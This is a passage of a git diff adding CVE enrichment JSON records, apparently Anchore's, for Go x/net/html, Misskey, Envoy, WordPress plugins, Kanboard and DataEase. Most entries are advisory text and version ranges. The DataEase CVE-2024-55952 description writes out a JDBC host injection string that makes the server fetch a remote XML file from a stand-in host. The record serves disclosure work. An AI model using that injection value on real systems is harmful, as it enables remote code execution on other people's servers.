Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This could cause a denial of service.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://go.dev/cl/637536", + "https://go.dev/issue/70906", + "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ", + "https://pkg.go.dev/vuln/GO-2024-3333" + ], + "upstream": { + "datePublished": "2024-12-18T20:38:22.660Z", + "dateReserved": "2024-08-27T19:41:58.555Z", + "dateUpdated": "2024-12-18T20:38:22.660Z", + "digest": "8db68a24455d0e0e796caf0eac80ee0e92d3ed65bb8890308b09f1c3e9971714" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://pkg.go.dev", + "cpes": [ + "cpe:2.3:a:golang:networking:*:*:*:*:*:go:*:*" + ], + "packageName": "golang.org/x/net/html", + "packageType": "go-module", + "product": "golang.org/x/net/html", + "programRoutines": [ + { + "name": "parseDoctype" + }, + { + "name": "htmlIntegrationPoint" + }, + { + "name": "inTableIM" + }, + { + "name": "inBodyIM" + }, + { + "name": "Parse" + }, + { + "name": "ParseFragment" + }, + { + "name": "ParseFragmentWithOptions" + }, + { + "name": "ParseWithOptions" + } + ], + "repo": "https://cs.opensource.google/go/x/net", + "vendor": "golang.org/x/net", + "versions": [ + { + "lessThan": "0.33.0", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-49363.json b/data/anchore/2024/CVE-2024-49363.json new file mode 100644 index 00000000..7ea59295 --- /dev/null +++ b/data/anchore/2024/CVE-2024-49363.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-49363", + "description": "Misskey is an open source, federated social media platform. In affected versions FileServerService (media proxy) in github.com/misskey-dev/misskey 2024.10.1 or earlier did not detect proxy loops, which allows remote actors to execute a self-propagating reflected/amplified distributed denial-of-service via a maliciously crafted note. FileServerService.prototype.proxyHandler did not check incoming requests are not coming from another proxy server. An attacker can execute an amplified denial-of-service by sending a nested proxy request to the server and end the request with a malicious redirect back to another nested proxy request.\nLeading to unbounded recursion until the original request is timed out. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. Users unable to upgrade may configure the reverse proxy to block requests to the proxy with an empty User-Agent header or one containing Misskey/. An attacker can not effectively modify the User-Agent header without making another request to the server.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-gq5q-c77c-v236" + ], + "upstream": { + "datePublished": "2024-12-18T19:24:34.399Z", + "dateReserved": "2024-10-14T13:56:34.810Z", + "dateUpdated": "2024-12-18T19:24:34.399Z", + "digest": "2acbb92bcce0940e49ce3a7552615cdbaf40fbd84ac47a493d3e104c2d0e97ac" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-52579.json b/data/anchore/2024/CVE-2024-52579.json new file mode 100644 index 00000000..c84cc578 --- /dev/null +++ b/data/anchore/2024/CVE-2024-52579.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-52579", + "description": "Misskey is an open source, federated social media platform. Some APIs using `HttpRequestService` do not properly check the target host. This vulnerability allows an attacker to send POST or GET requests to the internal server, which may result in a SSRF attack.It allows an attacker to send POST or GET requests (with some controllable URL parameters) to private IPs, enabling further attacks on internal servers. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-5q3h-wpfw-hjjw" + ], + "upstream": { + "datePublished": "2024-12-18T19:22:31.869Z", + "dateReserved": "2024-11-14T15:05:46.765Z", + "dateUpdated": "2024-12-18T19:22:31.869Z", + "digest": "5e211ec2a2eb088f01aa6b345b3509f0c8de0f5c885db36b14604756a20fbb4d" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-52590.json b/data/anchore/2024/CVE-2024-52590.json new file mode 100644 index 00000000..86679e40 --- /dev/null +++ b/data/anchore/2024/CVE-2024-52590.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-52590", + "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` allows an attacker to create fake user profiles that appear to be from a different instance than the one where they actually exist. These profiles can be used to impersonate existing users from the target instance. Vulnerable Misskey instances will accept spoofed users as valid, allowing an attacker to impersonate users on another instance. Attackers have full control of the spoofed user and can post, renote, or otherwise interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-7vgr-p3vc-p4h2" + ], + "upstream": { + "datePublished": "2024-12-18T19:21:32.872Z", + "dateReserved": "2024-11-14T15:05:46.767Z", + "dateUpdated": "2024-12-18T19:21:32.872Z", + "digest": "b8c874adb1dc981aa1ed29b6701953216725ec7c5c4d496728877bb5c83da08e" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "2024.8.0-rc.3", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-52591.json b/data/anchore/2024/CVE-2024-52591.json new file mode 100644 index 00000000..52b37427 --- /dev/null +++ b/data/anchore/2024/CVE-2024-52591.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-52591", + "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` and `HttpRequestService.getActivityJson` allows an attacker to create fake user profiles and forged notes. The spoofed users will appear to be from a different instance than the one where they actually exist, and the forged notes will appear to be posted by a different user. Vulnerable Misskey instances will accept the spoofed objects as valid, allowing an attacker to impersonate other users and instances. The attacker retains full control of the spoofed user / note and can interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-m2gq-69fp-6hv4" + ], + "upstream": { + "datePublished": "2024-12-18T19:20:31.238Z", + "dateReserved": "2024-11-14T15:05:46.767Z", + "dateUpdated": "2024-12-18T19:20:31.238Z", + "digest": "5e211ec2a2eb088f01aa6b345b3509f0c8de0f5c885db36b14604756a20fbb4d" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-52592.json b/data/anchore/2024/CVE-2024-52592.json new file mode 100644 index 00000000..311d39e8 --- /dev/null +++ b/data/anchore/2024/CVE-2024-52592.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-52592", + "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApInboxService.update` allows an attacker to modify the result of polls belonging to another user. No authentication is required, except for a valid signature from any actor on any remote instance. Vulnerable Misskey instances will accept spoofed updates for remote polls. Local polls are unaffected. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-5h8r-gq97-xv69" + ], + "upstream": { + "datePublished": "2024-12-18T19:19:17.863Z", + "dateReserved": "2024-11-14T15:05:46.768Z", + "dateUpdated": "2024-12-18T21:30:10.754Z", + "digest": "942aac0c68a5ac5d46431acea26b55d3e3fb29f3a898d4840085dab027d08574" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "10.92.1", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-52593.json b/data/anchore/2024/CVE-2024-52593.json new file mode 100644 index 00000000..d047da75 --- /dev/null +++ b/data/anchore/2024/CVE-2024-52593.json @@ -0,0 +1,43 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-52593", + "description": "Misskey is an open source, federated social media platform.In affected versions missing validation in `NoteCreateService.insertNote`, `ApPersonService.createPerson`, and `ApPersonService.updatePerson` allows an attacker to control the target of any \"origin\" links (such as the \"view on remote instance\" banner). Any HTTPS URL can be set, even if it belongs to a different domain than the note / user. Vulnerable Misskey instances will use the unverified URL for several clickable links, allowing an attacker to conduct phishing or other attacks against remote users. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/misskey-dev/misskey/security/advisories/GHSA-675w-hf2m-qwmj" + ], + "upstream": { + "datePublished": "2024-12-18T19:17:49.041Z", + "dateReserved": "2024-11-14T15:05:46.768Z", + "dateUpdated": "2024-12-18T21:31:19.011Z", + "digest": "bdc1438689250431d98bf2f44a9b05de677da660f251af55b3fd5bd699234587" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*" + ], + "packageName": "misskey-dev/misskey", + "product": "misskey", + "repo": "https://github.com/misskey-dev/misskey", + "vendor": "misskey-dev", + "versions": [ + { + "lessThan": "2024.11.0-alpha.3", + "status": "affected", + "version": "12.29.0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-53269.json b/data/anchore/2024/CVE-2024-53269.json new file mode 100644 index 00000000..09e6ccb2 --- /dev/null +++ b/data/anchore/2024/CVE-2024-53269.json @@ -0,0 +1,56 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-53269", + "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. When additional address are not ip addresses, then the Happy Eyeballs sorting algorithm will crash in data plane. This issue has been addressed in releases 1.32.2, 1.31.4, and 1.30.8. Users are advised to upgrade. Users unable to upgrade may disable Happy Eyeballs and/or change the IP configuration.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/envoyproxy/envoy/pull/37743/commits/3f62168d86aceb90f743f63b50cc711710b1c401", + "https://github.com/envoyproxy/envoy/security/advisories/GHSA-mfqp-7mmj-rm53" + ], + "upstream": { + "datePublished": "2024-12-18T19:12:17.033Z", + "dateReserved": "2024-11-19T20:08:14.482Z", + "dateUpdated": "2024-12-18T21:36:18.888Z", + "digest": "1e3f31720798dea9af04403fc63677ab42aad4d5a8a89f52f1397b0528304b67" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*" + ], + "packageName": "envoyproxy/envoy", + "product": "envoy", + "repo": "https://github.com/envoyproxy/envoy", + "vendor": "envoyproxy", + "versions": [ + { + "lessThan": "1.32.2", + "status": "affected", + "version": "1.32.0", + "versionType": "custom" + }, + { + "lessThan": "1.31.4", + "status": "affected", + "version": "1.31.0", + "versionType": "custom" + }, + { + "lessThan": "1.30.8", + "status": "affected", + "version": "1.30.0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-53270.json b/data/anchore/2024/CVE-2024-53270.json new file mode 100644 index 00000000..7da3f68b --- /dev/null +++ b/data/anchore/2024/CVE-2024-53270.json @@ -0,0 +1,62 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-53270", + "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions `sendOverloadError` is going to assume the active request exists when `envoy.load_shed_points.http1_server_abort_dispatch` is configured. If `active_request` is nullptr, only onMessageBeginImpl() is called. However, the `onMessageBeginImpl` will directly return ok status if the stream is already reset leading to the nullptr reference. The downstream reset can actually happen during the H/2 upstream reset. As a result envoy may crash. This issue has been addressed in releases 1.32.3, 1.31.5, 1.30.9, and 1.29.12. Users are advised to upgrade. Users unable to upgrade may disable `http1_server_abort_dispatch` load shed point and/or use a high threshold.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/envoyproxy/envoy/pull/37743/commits/6cf8afda956ba67c9afad185b962325a5242ef02", + "https://github.com/envoyproxy/envoy/security/advisories/GHSA-q9qv-8j52-77p3" + ], + "upstream": { + "datePublished": "2024-12-18T19:12:18.775Z", + "dateReserved": "2024-11-19T20:08:14.482Z", + "dateUpdated": "2024-12-18T21:35:24.476Z", + "digest": "2742c3f383a7f8ca836773cd97a1a4b2e88d7a139b79e5dce4ad6e21422a6491" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*" + ], + "packageName": "envoyproxy/envoy", + "product": "envoy", + "repo": "https://github.com/envoyproxy/envoy", + "vendor": "envoyproxy", + "versions": [ + { + "lessThan": "1.32.3", + "status": "affected", + "version": "1.32.0", + "versionType": "custom" + }, + { + "lessThan": "1.31.5", + "status": "affected", + "version": "1.31.0", + "versionType": "custom" + }, + { + "lessThan": "1.30.9", + "status": "affected", + "version": "1.30.0", + "versionType": "custom" + }, + { + "lessThan": "1.29.12", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-53271.json b/data/anchore/2024/CVE-2024-53271.json new file mode 100644 index 00000000..816cbc45 --- /dev/null +++ b/data/anchore/2024/CVE-2024-53271.json @@ -0,0 +1,50 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-53271", + "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions envoy does not properly handle http 1.1 non-101 1xx responses. This can lead to downstream failures in networked devices. This issue has been addressed in versions 1.31.5 and 1.32.3. Users are advised to upgrade. There are no known workarounds for this issue.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/envoyproxy/envoy/commit/da56f6da63079baecef9183436ee5f4141a59af8", + "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rmm5-h2wv-mg4f" + ], + "upstream": { + "datePublished": "2024-12-18T19:12:20.612Z", + "dateReserved": "2024-11-19T20:08:14.482Z", + "dateUpdated": "2024-12-18T21:34:22.425Z", + "digest": "f5281098cd31f84f3cf35b985a632346ac408c9310c4bc700a5aed4c889d7c10" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*" + ], + "packageName": "envoyproxy/envoy", + "product": "envoy", + "repo": "https://github.com/envoyproxy/envoy", + "vendor": "envoyproxy", + "versions": [ + { + "lessThan": "1.31.5", + "status": "affected", + "version": "1.31.0", + "versionType": "custom" + }, + { + "lessThan": "1.32.3", + "status": "affected", + "version": "1.32.0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54265.json b/data/anchore/2024/CVE-2024-54265.json index b02cc069..af6e4844 100644 --- a/data/anchore/2024/CVE-2024-54265.json +++ b/data/anchore/2024/CVE-2024-54265.json @@ -31,7 +31,7 @@ "vendor": "UkrSolution", "versions": [ { - "lessThanOrEqual": "1.6.6", + "lessThan": "1.6.7", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9faf3293-191c-48fb-a932-d61325d6c2e0?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54266.json b/data/anchore/2024/CVE-2024-54266.json index 3c92184c..100c554c 100644 --- a/data/anchore/2024/CVE-2024-54266.json +++ b/data/anchore/2024/CVE-2024-54266.json @@ -31,7 +31,7 @@ "vendor": "ImageRecycle", "versions": [ { - "lessThanOrEqual": "3.1.16", + "lessThan": "3.1.17", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3947d20c-7e92-43d6-83cc-59efe1049799?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54267.json b/data/anchore/2024/CVE-2024-54267.json index 67f24719..64c2a49e 100644 --- a/data/anchore/2024/CVE-2024-54267.json +++ b/data/anchore/2024/CVE-2024-54267.json @@ -31,7 +31,7 @@ "vendor": "CreativeMindsSolutions", "versions": [ { - "lessThanOrEqual": "3.2.6", + "lessThan": "3.2.7", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54268.json b/data/anchore/2024/CVE-2024-54268.json index 8497b28c..93982b8c 100644 --- a/data/anchore/2024/CVE-2024-54268.json +++ b/data/anchore/2024/CVE-2024-54268.json @@ -28,7 +28,7 @@ "vendor": "SiteOrigin", "versions": [ { - "lessThanOrEqual": "1.64.0", + "lessThan": "1.64.1", "status": "affected", "version": "0", "versionType": "custom" @@ -39,6 +39,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54289.json b/data/anchore/2024/CVE-2024-54289.json index 232599d3..c96ad4eb 100644 --- a/data/anchore/2024/CVE-2024-54289.json +++ b/data/anchore/2024/CVE-2024-54289.json @@ -40,6 +40,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6424c34a-a4cd-49fc-a6d4-b2bbd9dcb42c?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54298.json b/data/anchore/2024/CVE-2024-54298.json index bccf39e4..5a4b6d25 100644 --- a/data/anchore/2024/CVE-2024-54298.json +++ b/data/anchore/2024/CVE-2024-54298.json @@ -31,7 +31,7 @@ "vendor": "Bill Minozzi", "versions": [ { - "lessThanOrEqual": "4.46", + "lessThan": "4.48", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ddd1ccda-e96a-4dd7-a68f-b42c40619bf6?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54323.json b/data/anchore/2024/CVE-2024-54323.json index a4a64c61..4a186864 100644 --- a/data/anchore/2024/CVE-2024-54323.json +++ b/data/anchore/2024/CVE-2024-54323.json @@ -31,7 +31,7 @@ "vendor": "WPExpertsio", "versions": [ { - "lessThanOrEqual": "2.6.2", + "lessThan": "2.6.4", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c00e07a-7a0b-4cfa-8f6b-b03e3b485f07?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-54326.json b/data/anchore/2024/CVE-2024-54326.json index 738c9150..21fd8c3d 100644 --- a/data/anchore/2024/CVE-2024-54326.json +++ b/data/anchore/2024/CVE-2024-54326.json @@ -31,7 +31,7 @@ "vendor": "Eyal Fitoussi", "versions": [ { - "lessThanOrEqual": "4.5.0.4", + "lessThan": "4.5.1", "status": "affected", "version": "0", "versionType": "custom" @@ -42,6 +42,11 @@ "providerMetadata": { "orgId": "00000000-0000-4000-8000-000000000000", "shortName": "anchoreadp" - } + }, + "references": [ + { + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f7626b3-86b5-4aa2-871b-07f84a43c47f?source=cve" + } + ] } } \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-55603.json b/data/anchore/2024/CVE-2024-55603.json new file mode 100644 index 00000000..54242eea --- /dev/null +++ b/data/anchore/2024/CVE-2024-55603.json @@ -0,0 +1,50 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-55603", + "description": "Kanboard is project management software that focuses on the Kanban methodology. In affected versions sessions are still usable even though their lifetime has exceeded. Kanboard implements a cutom session handler (`app/Core/Session/SessionHandler.php`), to store the session data in a database. Therefore, when a `session_id` is given, kanboard queries the data from the `sessions` sql table. At this point, it does not correctly verify, if a given `session_id` has already exceeded its lifetime (`expires_at`).\nThus, a session which's lifetime is already `> time()`, is still queried from the database and hence a valid login. The implemented **SessionHandlerInterface::gc** function, that does remove invalid sessions, is called only **with a certain probability** (_Cleans up expired sessions. Called by `session_start()`, based on `session.gc_divisor`, `session.gc_probability` and `session.gc_maxlifetime` settings_) accordingly to the php documentation. In the official Kanboard docker image these values default to: session.gc_probability=1, session.gc_divisor=1000. Thus, an expired session is only terminated with probability 1/1000. This issue has been addressed in release 1.2.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/kanboard/kanboard/blob/main/app/Core/Session/SessionHandler.php#L40", + "https://github.com/kanboard/kanboard/commit/7ce61c34d962ca8b5dce776289ddf4b207be6e78", + "https://github.com/kanboard/kanboard/security/advisories/GHSA-gv5c-8pxr-p484", + "https://www.php.net/manual/en/function.session-start.php", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-divisor", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-maxlifetime", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-probability", + "https://www.php.net/manual/en/sessionhandlerinterface.gc.php" + ], + "upstream": { + "datePublished": "2024-12-18T23:52:57.327Z", + "dateReserved": "2024-12-09T14:22:52.524Z", + "dateUpdated": "2024-12-18T23:52:57.327Z", + "digest": "5d64d425b05102957b56d6653ffb1d9a1e71933f51f7be73247857a7e0790538" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*" + ], + "packageName": "kanboard/kanboard", + "product": "kanboard", + "repo": "https://github.com/kanboard/kanboard", + "vendor": "kanboard", + "versions": [ + { + "lessThan": "1.2.43", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-55952.json b/data/anchore/2024/CVE-2024-55952.json new file mode 100644 index 00000000..0ec08099 --- /dev/null +++ b/data/anchore/2024/CVE-2024-55952.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-55952", + "description": "DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1", + "https://github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qw" + ], + "upstream": { + "datePublished": "2024-12-18T18:49:24.214Z", + "dateReserved": "2024-12-13T17:47:38.371Z", + "dateUpdated": "2024-12-18T19:16:19.747Z", + "digest": "e2fa6a8a95dd4aa2f488e58daa4bc9da30baf310939ce85cfa7f03ea74ffedd7" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", + "cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*" + ], + "packageName": "dataease/dataease", + "product": "dataease", + "repo": "https://github.com/dataease/dataease", + "vendor": "dataease", + "versions": [ + { + "lessThan": "1.18.27", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-55953.json b/data/anchore/2024/CVE-2024-55953.json new file mode 100644 index 00000000..ea8bd221 --- /dev/null +++ b/data/anchore/2024/CVE-2024-55953.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-55953", + "description": "DataEase is an open source business analytics tool. Authenticated users can read and deserialize arbitrary files through the background JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. This vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1", + "https://github.com/dataease/dataease/security/advisories/GHSA-mrf3-9q84-rcmf" + ], + "upstream": { + "datePublished": "2024-12-18T18:49:21.632Z", + "dateReserved": "2024-12-13T17:47:38.371Z", + "dateUpdated": "2024-12-18T19:16:27.090Z", + "digest": "e2fa6a8a95dd4aa2f488e58daa4bc9da30baf310939ce85cfa7f03ea74ffedd7" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", + "cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*" + ], + "packageName": "dataease/dataease", + "product": "dataease", + "repo": "https://github.com/dataease/dataease", + "vendor": "dataease", + "versions": [ + { + "lessThan": "1.18.27", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-55985.json b/data/anchore/2024/CVE-2024-55985.json new file mode 100644 index 00000000..9e5c486e --- /dev/null +++ 